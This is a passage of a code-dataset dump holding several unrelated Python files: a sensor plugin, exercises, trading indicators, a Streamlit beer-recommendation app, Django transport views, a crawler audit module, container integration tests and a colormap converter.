[IPv4Address('192.168.1.1')]\nUnavailable address list: [IPv4Address('192.168.1.2'), IPv4Address('192.168.1.3')]\n\"\"\"\n","sub_path":"exercises/12_useful_modules/task_12_2.py","file_name":"task_12_2.py","file_ext":"py","file_size_in_byte":3513,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"166560821","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\nimport plugins\nimport psutil\n\nclass Plugin(plugins.BasePlugin):\n __name__ = 'temp'\n\n def run(self, *unused):\n '''\n expirimental plugin used to collect temperature from system sensors\n plugin can be tested by running nixstatsagent test temp\n '''\n data = {}\n\n if not hasattr(psutil, \"sensors_temperatures\"):\n return \"platform not supported\"\n\n try:\n temps = psutil.sensors_temperatures()\n except:\n return \"can't read any temperature\"\n\n for device, temp in temps.items():\n for value in temp:\n type = value[0]\n if value[0] == '':\n type = device\n data[type] = value[1]\n return data\n\n\nif __name__ == '__main__':\n Plugin().execute()\n","sub_path":"nixstatsagent/plugins/temp.py","file_name":"temp.py","file_ext":"py","file_size_in_byte":866,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"243793747","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\n\nx = int(input())\ntemp = 0\nfor i in [10,5,1]:\n if x>=i:\n change = x//i\n temp += change\n x = x%i\n if x == 0:\n print(temp)\n quit()","sub_path":"Algorithmic Toolbox/Week 3- Greedy Algorithms/money_change.py","file_name":"money_change.py","file_ext":"py","file_size_in_byte":229,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"63296502","text":"from .ClPokemon import *\n\nclass Attack(Pokemon):\n def __init__(self, q):\n super().__init__(q)\n self.attack=''\n self.superattack=''\n \n def enter(self):\n note = [['name', self.name],\n ['poktype', self.poktype],\n ['cp', self.cp],\n ['hp', self.hp],\n ['attack', self.attack],\n ['superattack', self.superattack]]\n return note\n","sub_path":"st16/ClAttack.py","file_name":"ClAttack.py","file_ext":"py","file_size_in_byte":439,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"272906279","text":"\"\"\"\nRuns the ichimoku strategy over the market data\n\"\"\"\n\nimport structlog\n\n\nfrom strategies.strategy_utils import Utils\n\n\nclass IchimokuCloud():\n \"\"\"\n Runs the ichimoku strategy over the market data\n \"\"\"\n def __init__(self):\n self.logger = structlog.get_logger()\n self.utils = Utils()\n\n def get_kijunsen(self, historical_data):\n \"\"\"\n Calculates (26 period high + 26 period low) / 2\n Also known as the \"Kijun-sen\" line\n \"\"\"\n\n closing_prices = self.utils.get_closing_prices(historical_data)\n period_high = max(closing_prices)\n period_low = min(closing_prices)\n\n return (period_high + period_low) / 2\n\n def get_tenkansen(self, historical_data):\n \"\"\"\n Calculates (9 period high + 9 period low) / 2\n Also known as the \"Tenkan-sen\" line\n \"\"\"\n\n closing_prices = self.utils.get_closing_prices(historical_data)\n period_high = max(closing_prices)\n period_low = min(closing_prices)\n\n return (period_high + period_low) / 2\n\n def get_senkou_span_a(self, kijunsen_data, tenkansen_data):\n \"\"\"\n Calculates (Conversion Line + Base Line) / 2\n Also known as the \"Senkou Span A\" line\n \"\"\"\n\n kijunsen_line = self.get_kijunsen(kijunsen_data)\n tenkansen_line = self.get_tenkansen(tenkansen_data)\n\n return (kijunsen_line + tenkansen_line) / 2\n\n def get_senkou_span_b(self, senkou_span_b_data):\n \"\"\"\n Calculates (52 period high + 52 period low) / 2\n Also known as the \"Senkou Span B\" line\n \"\"\"\n \n closing_prices = self.utils.get_closing_prices(senkou_span_b_data)\n period_high = max(closing_prices)\n period_low = min(closing_prices)\n\n return (period_high + period_low) / 2\n","sub_path":"app/strategies/ichimoku_cloud.py","file_name":"ichimoku_cloud.py","file_ext":"py","file_size_in_byte":1810,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"609678328","text":"from data.db_functions import DBFunctions\r\nfrom functions.email_functions import send_mail\r\nfrom data.create_recommender import get_beer_columns, melt_user_item_matrix\r\nimport numpy as np\r\nimport pandas as pd\r\nimport streamlit as st\r\nfrom streamlit.hashing import _CodeHasher\r\nfrom streamlit.report_thread import get_report_ctx\r\nfrom streamlit.server.server import Server\r\nfrom time import sleep\r\nfrom turicreate import load_model, SFrame\r\n\r\n\r\npd.options.mode.chained_assignment = None\r\nst.set_page_config(layout=\"wide\")\r\n\r\n\r\ndef main():\r\n state = _get_state()\r\n pages = {\r\n \"Pesquisa\": display_pesquisa,\r\n \"Recomendações\": display_sugestoes,\r\n }\r\n\r\n st.sidebar.title(\":bookmark_tabs: MENU\")\r\n page = st.sidebar.selectbox(\r\n \"\",\r\n tuple(pages.keys())\r\n )\r\n\r\n # Display the selected page with the session state\r\n pages[page](state)\r\n\r\n # Mandatory to avoid rollbacks with widgets, must be called at the end of your app\r\n state.sync()\r\n\r\n\r\n@st.cache\r\ndef get_beer_list():\r\n db = DBFunctions()\r\n return db.get_df_from_query('beer_list')\r\n\r\n\r\ndef display_pesquisa(state):\r\n st.write('', unsafe_allow_html=True)\r\n st.markdown(\r\n '',\r\n unsafe_allow_html=True\r\n )\r\n st.image('fig/terabeer_banner.jpeg')\r\n\r\n st.markdown('''\r\n ## Olá, que bom que você veio!\r\n \r\n O TeraBeer é um sistema de recomendação de cervejas artesanais brasileiras baseado no seu paladar e no uso \r\n de Inteligência Artificial.\r\n \r\n Antes de mais nada, confirme que você tem mais de 18 anos:\r\n ''')\r\n\r\n if st.checkbox('Sim, tenho mais de 18 anos, internet!', False):\r\n st.text(\"\")\r\n st.markdown(\"![Sei...](https://media.giphy.com/media/VhLc1Mb9HlPo2Jo2ZG/giphy.gif)\")\r\n st.text(\"\")\r\n st.markdown('''\r\n ## :pencil: **PESQUISA**\r\n \r\n Agora responda as duas perguntas a seguir para gerar as suas recomendações.\r\n ''')\r\n\r\n options = ['', 'Gosto', 'Indiferente', 'Não gosto', 'Desconheço']\r\n\r\n st.markdown('''\r\n ### QUAL A SUA OPINIÃO SOBRE OS **ALIMENTOS E BEBIDAS** ABAIXO?\r\n ''')\r\n st.text(\"\")\r\n\r\n taste_questions = { # Key matches column names used in training, value is displayed in forms\r\n 'Alimento Chocolate amargo': 'Chocolate 70% cacau',\r\n 'Alimento Beringela': 'Beringela',\r\n 'Alimento Folhas escuras': 'Folhas escuras',\r\n 'Alimento Mel': 'Mel',\r\n 'Alimento Chocolate ao leite': 'Chocolate ao leite',\r\n 'Alimento Oreo': \"Cookies & Cream\",\r\n 'Alimento Salgadinho': 'Batata chips',\r\n 'Alimento Tomate': 'Tomate',\r\n 'Alimento Margherita': 'Margarita',\r\n 'Alimento Limonada': 'Limonada',\r\n 'Alimento Laranja': 'Laranja',\r\n 'Alimento Maracujá': 'Maracujá',\r\n 'Alimento Tangerina': 'Mexerica/tangerina',\r\n 'Alimento Pimentas': 'Pimenta',\r\n 'Alimento Cravo': 'Cravo',\r\n 'Alimento Banana': 'Banana',\r\n 'Alimento Gengibre': 'Gengibre',\r\n 'Alimento Canela': 'Canela',\r\n 'Alimento Bacon': 'Bacon',\r\n 'Alimento Café': 'Café sem açúcar'\r\n }\r\n\r\n feat_paladar = {}\r\n for feature_name, question in taste_questions.items():\r\n feat_paladar[feature_name] = st.radio(question, options, index=1)\r\n st.text(\"\")\r\n\r\n st.markdown('### QUAL A SUA OPINIÃO SOBRE OS SEGUINTES **ESTILOS DE CERVEJA**?')\r\n st.text(\"\")\r\n\r\n beer_questions = {\r\n 'Cerveja Pilsen': 'Pilsen/Lager',\r\n 'Cerveja Blonde': 'Golden Ale/Blonde Ale',\r\n 'Cerveja Trigo': 'Trigo (Weiss)',\r\n 'Cerveja APA': 'American Pale Ale (APA)',\r\n 'Cerveja IPA': 'India Pale Ale (IPA)',\r\n 'Cerveja Session IPA': 'Session IPA',\r\n 'Cerveja NEIPA': 'New England IPA/Juice IPA',\r\n 'Cerveja Porter': 'Porter/Stout',\r\n 'Cerveja Malzbier': 'Dunkel/Malzbier',\r\n 'Cerveja Witbier': 'Witbier',\r\n 'Cerveja Sour': 'Fruit Beer/Sour',\r\n 'Cerveja RIS': 'Russian Imperial Stout/Pastry Stout',\r\n 'Cerveja Lambic': 'Lambic'\r\n }\r\n\r\n for feature_name, question in beer_questions.items():\r\n feat_paladar[feature_name] = st.radio(question, options, index=4)\r\n st.text(\"\")\r\n\r\n st.text(\"\")\r\n exclude_known = st.checkbox('Desejo receber recomendações somente de estilos que eu não conheço', True)\r\n\r\n df_paladar = pd.DataFrame([feat_paladar], index=[-1]) # User-item matrix\r\n preference_map = {\r\n \"Gosto\": 1,\r\n \"Não gosto\": 0,\r\n \"Indiferente\": 0.5,\r\n \"Desconheço\": np.nan\r\n }\r\n df_paladar.replace(preference_map, inplace=True)\r\n melt_df = melt_user_item_matrix(df_paladar)\r\n new_observation_data = melt_df\r\n # st.dataframe(new_observation_data)\r\n\r\n recommendable_beers = get_beer_columns(df_paladar)\r\n recommendable_beers.remove('Cerveja Pilsen')\r\n if not exclude_known: # Exclude beers user doesn't like at all if known beers can be recommended\r\n dislike_beers = melt_df[melt_df['rating'] < 1]['product'].to_list()\r\n for dislike_beer in dislike_beers:\r\n if dislike_beer in recommendable_beers:\r\n recommendable_beers.remove(dislike_beer)\r\n\r\n st.text(\"\")\r\n st.text(\"\")\r\n st.text(\"\")\r\n if st.button('Gerar recomendações'):\r\n model = load_model('data/recommending_system')\r\n if len(recommendable_beers) == 0:\r\n st.error('Não temos nenhuma cerveja para te recomendar :/')\r\n else:\r\n with st.spinner(text='Aguarde um instante enquanto analisamos as suas respostas...'):\r\n sleep(4) # Pretend making recommendations takes a while. Actually they are pretty fast\r\n recommendations = model.recommend(\r\n users=[-1],\r\n k=3,\r\n items=recommendable_beers,\r\n new_observation_data=SFrame(new_observation_data),\r\n exclude_known=exclude_known,\r\n ).to_dataframe()\r\n\r\n # st.dataframe(recommendations)\r\n if recommendations.empty and exclude_known:\r\n st.error('Você conhece muitas cervejas ein?! Que tal desmarcar a caixa acima?')\r\n else:\r\n st.success('Pronto! Selecione no menu à esquerda a página Recomendações.')\r\n sleep(3)\r\n state.recommendations, state.paladar = recommendations, df_paladar\r\n\r\n\r\ndef display_sugestoes(state):\r\n\r\n st.title(':beers: CERVEJAS RECOMENDADAS')\r\n st.markdown('''\r\n Estas são as cervejas artesanais brasileiras **mais recomendadas para você**. \r\n Ao final, você poderá enviar a lista de cervejas para o seu e-mail.\r\n ''')\r\n\r\n recommendations, df_paladar = state.recommendations, state.paladar\r\n\r\n # st.dataframe(df_paladar)\r\n # st.dataframe(recommendations)\r\n\r\n if not isinstance(recommendations, pd.DataFrame):\r\n st.error('Sua sessão expirou, responda novamente o formulário para ver as suas recomendações.')\r\n\r\n else:\r\n rename_beer_styles = {\r\n 'Cerveja Blonde': 'Blonde Ale',\r\n 'Cerveja Trigo': 'Weiss (Trigo)',\r\n 'Cerveja APA': 'American Pale Ale',\r\n 'Cerveja IPA': 'India Pale Ale',\r\n 'Cerveja Session IPA': 'Session IPA',\r\n 'Cerveja NEIPA': 'New England IPA',\r\n 'Cerveja Porter': 'Porter/Stout',\r\n 'Cerveja Malzbier': 'Dunkel/Malzbier',\r\n 'Cerveja Witbier': 'Witbier',\r\n 'Cerveja Sour': 'Sour/Fruit',\r\n 'Cerveja RIS': 'Russian Imperial Stout',\r\n 'Cerveja Lambic': 'Lambic'\r\n }\r\n recommendations.replace({'product': rename_beer_styles}, inplace=True)\r\n\r\n with st.spinner('Buscando cervejas...'):\r\n df_cervejas = get_beer_list()\r\n\r\n recommended_labels = pd.merge(recommendations, df_cervejas, left_on='product', right_on='terabeer_style')\r\n recommended_labels.sort_values(by=['score', 'ratings_avg'], ascending=[False, False])\r\n # st.dataframe(recommended_labels)\r\n\r\n origins = recommended_labels['origin_state'].unique().tolist()\r\n origin_filter = st.multiselect(\"Filtrar por estado:\", origins, default=origins)\r\n filtered_labels = recommended_labels[recommended_labels['origin_state'].isin(origin_filter)]\r\n max_beers = st.slider('Número máximo de rótulos por estilo', 1, 5, 3)\r\n\r\n df_style_1 = filtered_labels[filtered_labels['rank'] == 1]\r\n df_style_2 = filtered_labels[filtered_labels['rank'] == 2]\r\n df_style_3 = filtered_labels[filtered_labels['rank'] == 3]\r\n\r\n markdown_list = []\r\n image_list = []\r\n for df_style in [df_style_1, df_style_2, df_style_3]:\r\n if not df_style.empty:\r\n df_style.reset_index(drop=True, inplace=True)\r\n style_name = df_style['terabeer_style'][0]\r\n style_rank = df_style['rank'][0]\r\n style_score = df_style['score'][0]\r\n style_description = df_style['style_description'][0]\r\n style_harmonization = df_style['harmonization'][0]\r\n if style_harmonization:\r\n harmonization_line = f'

Harmoniza bem com: {style_harmonization}'\r\n else:\r\n harmonization_line = ''\r\n\r\n style_markdown = f\"\"\"\r\n
\r\n
\r\n

\r\n Estilo {style_rank}: {style_name} ({style_score:.1%} recomendado para você)\r\n

\r\n
\r\n

\r\n Descrição: {style_description} {harmonization_line}\r\n

\r\n
\r\n
\r\n \"\"\"\r\n st.markdown(style_markdown, unsafe_allow_html=True)\r\n markdown_list.append(style_markdown)\r\n\r\n for index, row in df_style.iloc[0:max_beers, :].iterrows():\r\n beer = row['name']\r\n brewery = row['brand']\r\n abv = row['abv']\r\n ibu = row['ibu']\r\n avg_rating = row['ratings_avg']\r\n count_ratings = int(row['ratings_count'])\r\n figure = row['figure']\r\n ratings_source = row['ratings_source']\r\n ratings_url = row['ratings_url']\r\n origin_state = row['origin_state']\r\n offer_url = row['offer_url']\r\n discount_coupon = row['discount_coupon']\r\n\r\n column1, column2 = st.beta_columns((1, 4))\r\n\r\n with column1: # Column with beer labels\r\n try:\r\n st.image(f'fig/{figure}', use_column_width=True)\r\n image_list.append(f'fig/{figure}')\r\n markdown_list.append(\r\n f\"\"\"\r\n
\r\n
\r\n \r\n
\r\n \"\"\"\r\n )\r\n\r\n except FileNotFoundError:\r\n st.image('fig/placeholder-image.jpg', use_column_width=True)\r\n image_list.append('fig/placeholder-image.jpg')\r\n markdown_list.append(\r\n f\"\"\"\r\n
\r\n
\r\n \r\n
\r\n \"\"\"\r\n )\r\n\r\n with column2: # Column with beer characteristics\r\n ratings_source_url = f'{ratings_source}'\r\n ratings_line = f'{avg_rating:.3} ({count_ratings} avaliações no {ratings_source_url})'\r\n ibu_line = f'{int(ibu)} unidades de amargor' if ibu > 0 else 'Indisponível'\r\n discount_phrase = f'(Cupom de desconto: {discount_coupon})' if discount_coupon else ''\r\n offer_line = f'Quero! {discount_phrase}'\r\n beer_markdown = f\"\"\"\r\n
\r\n

{beer} - {brewery}

\r\n

\r\n Origem: {origin_state}
\r\n Nota média: {ratings_line}
\r\n ABV: {abv}% álcool
\r\n IBU: {ibu_line}
\r\n {offer_line}\r\n

\r\n
\r\n \"\"\"\r\n st.markdown(beer_markdown, unsafe_allow_html=True)\r\n markdown_list.append(beer_markdown)\r\n\r\n st.text(\"\")\r\n st.text(\"\")\r\n st.markdown(\"### :mailbox: Para receber a lista acima no seu e-mail, digite-o abaixo e aperte enter:\")\r\n email = st.text_input('')\r\n if email:\r\n st.markdown(\"### Qual seu nome?\")\r\n name = st.text_input(' ')\r\n accept_beer_offers = st.checkbox(\r\n 'Aceito receber novidades do TeraBeer.',\r\n True\r\n )\r\n allow_data_usage = st.checkbox(\r\n 'Permito que utilizem minhas respostas para melhorar recomendações futuras.',\r\n True\r\n )\r\n st.text(\"\")\r\n\r\n if st.button('Enviar recomendações por email'):\r\n with st.spinner(text='Enviando...'):\r\n send_mail(email, name, markdown_list, image_list)\r\n\r\n st.success('Enviado! Confira sua caixa de entrada e lixo eletrônico.')\r\n\r\n if accept_beer_offers or allow_data_usage: # Try to send answers to database\r\n db = DBFunctions()\r\n try:\r\n db.send_answers_to_db(\r\n email=email,\r\n name=name,\r\n recommendations=recommendations,\r\n df_paladar=df_paladar,\r\n accept_beer_offers=accept_beer_offers,\r\n allow_data_usage=allow_data_usage,\r\n )\r\n except KeyError:\r\n pass\r\n\r\n\r\nclass _SessionState:\r\n\r\n def __init__(self, session, hash_funcs):\r\n \"\"\"Initialize SessionState instance.\"\"\"\r\n self.__dict__[\"_state\"] = {\r\n \"data\": {},\r\n \"hash\": None,\r\n \"hasher\": _CodeHasher(hash_funcs),\r\n \"is_rerun\": False,\r\n \"session\": session,\r\n }\r\n\r\n def __call__(self, **kwargs):\r\n \"\"\"Initialize state data once.\"\"\"\r\n for item, value in kwargs.items():\r\n if item not in self._state[\"data\"]:\r\n self._state[\"data\"][item] = value\r\n\r\n def __getitem__(self, item):\r\n \"\"\"Return a saved state value, None if item is undefined.\"\"\"\r\n return self._state[\"data\"].get(item, None)\r\n\r\n def __getattr__(self, item):\r\n \"\"\"Return a saved state value, None if item is undefined.\"\"\"\r\n return self._state[\"data\"].get(item, None)\r\n\r\n def __setitem__(self, item, value):\r\n \"\"\"Set state value.\"\"\"\r\n self._state[\"data\"][item] = value\r\n\r\n def __setattr__(self, item, value):\r\n \"\"\"Set state value.\"\"\"\r\n self._state[\"data\"][item] = value\r\n\r\n def clear(self):\r\n \"\"\"Clear session state and request a rerun.\"\"\"\r\n self._state[\"data\"].clear()\r\n self._state[\"session\"].request_rerun()\r\n\r\n def sync(self):\r\n \"\"\"Rerun the app with all state values up to date from the beginning to fix rollbacks.\"\"\"\r\n\r\n # Ensure to rerun only once to avoid infinite loops\r\n # caused by a constantly changing state value at each run.\r\n #\r\n # Example: state.value += 1\r\n if self._state[\"is_rerun\"]:\r\n self._state[\"is_rerun\"] = False\r\n\r\n elif self._state[\"hash\"] is not None:\r\n if self._state[\"hash\"] != self._state[\"hasher\"].to_bytes(self._state[\"data\"], None):\r\n self._state[\"is_rerun\"] = True\r\n self._state[\"session\"].request_rerun()\r\n\r\n self._state[\"hash\"] = self._state[\"hasher\"].to_bytes(self._state[\"data\"], None)\r\n\r\n\r\ndef _get_session():\r\n session_id = get_report_ctx().session_id\r\n session_info = Server.get_current()._get_session_info(session_id)\r\n\r\n if session_info is None:\r\n raise RuntimeError(\"Couldn't get your Streamlit Session object.\")\r\n\r\n return session_info.session\r\n\r\n\r\ndef _get_state(hash_funcs=None):\r\n session = _get_session()\r\n\r\n if not hasattr(session, \"_custom_session_state\"):\r\n session._custom_session_state = _SessionState(session, hash_funcs)\r\n\r\n return session._custom_session_state\r\n\r\n\r\nif __name__ == \"__main__\":\r\n main()\r\n","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":18213,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"340079760","text":"from django.contrib.gis.geos import Point\nfrom django.utils.translation import ugettext as _\n\nfrom molly.conf import app_by_application_name\n\nfrom molly.utils.views import BaseView\nfrom molly.utils.breadcrumbs import *\nfrom molly.favourites import get_favourites\n\nfrom molly.apps.places import get_entity\nfrom molly.apps.places.models import Entity, EntityType\n\nclass IndexView(BaseView):\n @BreadcrumbFactory\n def breadcrumb(self, request, context):\n return Breadcrumb(\n self.conf.local_name,\n None,\n _('Transport'),\n lazy_reverse('%s:index' % self.conf.local_name),\n )\n \n def initial_context(self, request):\n \n # Get our location for location sorting\n location = request.session.get('geolocation:location')\n if location:\n location = Point(location, srid=4326)\n \n context, entities = {'location':location}, set()\n \n # If train station is set on config, then include that\n if hasattr(self.conf, 'train_station'):\n if getattr(self.conf, 'train_station_nearest', False) and location:\n et = EntityType.objects.get(slug='rail-station')\n entity = et.entities_completion.filter(location__isnull=False).distance(location).order_by('distance')[0]\n else:\n scheme, value = self.conf.train_station.split(':')\n entity = get_entity(scheme, value)\n entities.add(entity)\n context['train_station'] = entity\n \n # If park and ride variable is set, then include those too:\n if hasattr(self.conf, 'park_and_rides'):\n park_and_rides = []\n for park_and_ride in self.conf.park_and_rides:\n scheme, value = park_and_ride.split(':')\n entity = get_entity(scheme, value)\n park_and_rides.append(entity)\n entities.add(entity)\n context['park_and_rides'] = park_and_rides\n \n # If service status provider is set, then include those too:\n if hasattr(self.conf, 'transit_status_provider'):\n context['transit_status'] = self.conf.transit_status_provider.get_status()\n \n context['nearby'] = {}\n for context_key in getattr(self.conf, 'nearby', {}):\n type_slug, count = self.conf.nearby[context_key]\n et = EntityType.objects.get(slug=type_slug)\n \n favourites = filter(\n lambda e: e is not None and et in e.all_types_completion.all(),\n [f.metadata.get('entity') for f in get_favourites(request)])\n \n if request.GET.get(context_key) == 'nearby':\n \n if location:\n es = et.entities_completion.filter(location__isnull=False).distance(location).order_by('distance')[:count]\n else:\n es = []\n results_type = 'Nearby'\n \n elif request.GET.get(context_key) == 'favourites':\n \n es = favourites \n results_type = 'Favourite'\n \n else:\n \n if len(favourites) == 0:\n if location:\n es = et.entities_completion.filter(location__isnull=False).distance(location).order_by('distance')[:count]\n else:\n es = []\n else:\n es = favourites\n \n results_type = 'Favourite' if len(favourites) > 0 else 'Nearby'\n \n for e in (e for e in es if hasattr(e, 'distance')):\n distance, e.bearing = e.get_distance_and_bearing_from(location)\n \n entities |= set(es)\n context['nearby'][context_key] = {\n 'type': et,\n 'entities': es,\n 'results_type': results_type,\n }\n \n if getattr(self.conf, 'travel_alerts', False):\n es = Entity.objects.filter(primary_type__slug='travel-alert')\n if location:\n es = es.filter(location__isnull=False).distance(location).order_by('distance')\n else:\n es = es.order_by('title')\n entities |= set(es)\n context['travel_alerts'] = es\n \n # Get any real-time information for all the places we're about to display\n places_conf = app_by_application_name('molly.apps.places')\n for provider in reversed(places_conf.providers):\n provider.augment_metadata(entities,\n board=request.GET.get('board', 'departures'))\n \n context['board'] = request.GET.get('board', 'departures')\n return context\n \n def handle_GET(self, request, context):\n return self.render(request, context, 'transport/index')","sub_path":"molly/apps/transport/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4946,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"51809934","text":"#coding=utf-8\r\nfrom p_common.p_db import m_db_func\r\nfrom p_common.p_cache import m_cache_factory\r\nfrom p_common.p_uuid import m_uuid\r\nimport m_audit_func\r\n\r\nclass Audit(object):\r\n def __init__(self):\r\n self.auditCount = 0 #用于前端显示\r\n self.db = m_db_func.DB_Func()#建立一个数据库连接\r\n self.db.Connect()\r\n self.optimization = \"set unique_checks=0\"\r\n self.db.ExecuteCommitSql(self.optimization)\r\n self.func = m_audit_func.Audit_func(self.db)\r\n \r\n def Start(self):\r\n while True:\r\n goodInfo = m_cache_factory.GetInstance('dd').Read()\r\n goodInfo.BeautifyMyself()\r\n self.DealFunc(goodInfo)\r\n self.auditCount += 1\r\n \r\n def DealFunc(self, goodInfo):\r\n dbItem = self.func.SelectGoods(goodInfo.goodsId, goodInfo.websiteName)\r\n if dbItem:\r\n if not self.func.ComparePrice(dbItem, goodInfo.goodsPrice):\r\n self.func.UpdateGood(dbItem[0], goodInfo)\r\n self.func.InsertPrice(dbItem[0],goodInfo.goodsPrice)\r\n else:\r\n if self.func.CompareGood(dbItem, goodInfo):\r\n self.func.UpdateGood(dbItem[0], goodInfo)\r\n else:\r\n uniqueId = m_uuid.getUuid()\r\n self.func.InsertGood(uniqueId,goodInfo)\r\n self.func.InsertPrice(uniqueId, goodInfo.goodsPrice)\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","sub_path":"CrawlFramework/p_engine/p_auditData/m_audit.py","file_name":"m_audit.py","file_ext":"py","file_size_in_byte":1432,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"272199375","text":"# pylint: disable=W0613\n\n# Copyright (C) 2018 The Android Open Source Project\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nfrom pathlib import Path\n\nimport os.path\n\nimport git\nimport pytest\nimport requests\n\n\n@pytest.fixture(scope=\"function\")\ndef repo_dir(tmp_path_factory, random_repo_name):\n return tmp_path_factory.mktemp(random_repo_name)\n\n\n@pytest.fixture(scope=\"function\")\ndef mock_repo(repo_dir):\n repo = git.Repo.init(repo_dir)\n file_name = os.path.join(repo_dir, \"test.txt\")\n Path(file_name).touch()\n repo.index.add([file_name])\n repo.index.commit(\"initial commit\")\n return repo\n\n\n@pytest.mark.docker\n@pytest.mark.integration\ndef test_apache_git_http_backend_apache_running(container_run, base_url):\n request = requests.get(base_url)\n assert request.status_code == 200\n\n\n@pytest.mark.docker\n@pytest.mark.integration\ndef test_apache_git_http_backend_repo_creation(\n container_run, basic_auth_creds, repo_creation_url\n):\n request = requests.get(\n repo_creation_url,\n auth=requests.auth.HTTPBasicAuth(\n basic_auth_creds[\"user\"], basic_auth_creds[\"password\"]\n ),\n )\n assert request.status_code == 201\n\n\n@pytest.mark.docker\n@pytest.mark.integration\ndef test_apache_git_http_backend_repo_creation_fails_without_credentials(\n container_run, repo_creation_url\n):\n request = requests.get(repo_creation_url)\n assert request.status_code == 401\n\n\n@pytest.mark.docker\n@pytest.mark.integration\ndef test_apache_git_http_backend_repo_creation_fails_wrong_fs_permissions(\n container_run, basic_auth_creds, repo_creation_url\n):\n container_run.exec_run(\"chown -R root:root /var/gerrit/git\")\n request = requests.get(\n repo_creation_url,\n auth=requests.auth.HTTPBasicAuth(\n basic_auth_creds[\"user\"], basic_auth_creds[\"password\"]\n ),\n )\n container_run.exec_run(\"chown -R gerrit:users /var/gerrit/git\")\n assert request.status_code == 500\n\n\n@pytest.mark.docker\n@pytest.mark.integration\ndef test_apache_git_http_backend_repo_creation_push_repo(\n container_run, base_url, basic_auth_creds, mock_repo, random_repo_name\n):\n container_run.exec_run(\n \"su -c 'git init --bare /var/gerrit/git/%s.git' gerrit\" % random_repo_name\n )\n url = \"%s/git/%s.git\" % (base_url, random_repo_name)\n url = url.replace(\n \"//\", \"//%s:%s@\" % (basic_auth_creds[\"user\"], basic_auth_creds[\"password\"])\n )\n origin = mock_repo.create_remote(\"origin\", url)\n assert origin.exists()\n\n origin.fetch()\n result = origin.push(refspec=\"master:master\")\n assert result\n\n remote_refs = {}\n git_cmd = git.cmd.Git()\n for ref in git_cmd.ls_remote(url).split(\"\\n\"):\n hash_ref_list = ref.split(\"\\t\")\n remote_refs[hash_ref_list[1]] = hash_ref_list[0]\n assert remote_refs[\"HEAD\"] == mock_repo.head.object.hexsha\n","sub_path":"tests/container-images/apache-git-http-backend/test_container_integration_apache_git_http_backend.py","file_name":"test_container_integration_apache_git_http_backend.py","file_ext":"py","file_size_in_byte":3349,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"367182327","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Jul 25 16:28:28 2014\n\n@author: jake\n\"\"\"\n\n#from scipy.io import read_array\n#from scipy import zeros, linspace, shape, Float, concatenate\nfrom numpy import *\nimport pickle\n\n# Credit for this function goes to:\n# http://matplotlib.1069221.n5.nabble.com/function-to-create-a-colormap-from-cpt-palette-td2165.html\ndef cpt2seg(file_name, sym=False, discrete=False):\n \"\"\"Reads a .cpt palette and returns a segmented colormap.\n\n sym : If True, the returned colormap contains the palette and a mirrored copy.\n For example, a blue-red-green palette would return a blue-red-green-green-red-blue colormap.\n\n discrete : If true, the returned colormap has a fixed number of uniform colors.\n That is, colors are not interpolated to form a continuous range.\n\n Example :\n >>> _palette_data = cpt2seg('palette.cpt')\n >>> palette = matplotlib.colors.LinearSegmentedColormap('palette', _palette_data, 100)\n >>> imshow(X, cmap=palette)\n \"\"\"\n \n \n dic = {}\n f = open(file_name, 'r')\n rgb = loadtxt(f)\n \n rgb = rgb/255.\n s = shape(rgb)\n colors = ['red', 'green', 'blue']\n for c in colors:\n i = colors.index(c)\n x = rgb[:, i+1]\n\n if discrete:\n if sym:\n dic[c] = zeros((2*s[0]+1, 3), dtype='f')\n dic[c][:,0] = linspace(0,1,2*s[0]+1)\n vec = concatenate((x ,x[::-1]))\n else:\n dic[c] = zeros((s[0]+1, 3), dtype='f')\n dic[c][:,0] = linspace(0,1,s[0]+1)\n vec = x\n dic[c][1:, 1] = vec\n dic[c][:-1,2] = vec\n \n else:\n if sym:\n dic[c] = zeros((2*s[0], 3), dtype='f')\n dic[c][:,0] = linspace(0,1,2*s[0])\n vec = concatenate((x ,x[::-1]))\n else:\n dic[c] = zeros((s[0], 3), dtype='f')\n dic[c][:,0] = linspace(0,1,s[0])\n vec = x\n dic[c][:, 1] = vec\n dic[c][:, 2] = vec\n \n return dic\n\ncm = cpt2seg('wiki.cpt', discrete = True)\n\nprint(cm)\n# Save the color map dictionary\npickle.dump( cm, open( \"wiki.p\", \"wb\" ) )\n\n","sub_path":"plot/color_maps/cpt_convert.py","file_name":"cpt_convert.py","file_ext":"py","file_size_in_byte":2187,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"341927892","text":"# -*- coding: utf-8 -*-\n# @Time : 2019/7/9\n# @Author : CHEN Li and ZENG Yanru\n# @Email : 595438103@qq.com\n# @File : KNNBinding.py\n# @Software: PyCharm\nfrom multiprocessing.dummy import Pool as ThreadPool\nfrom multiprocessing import Pool\nimport numpy as np\n\nblosum62_matrix = {}\n# 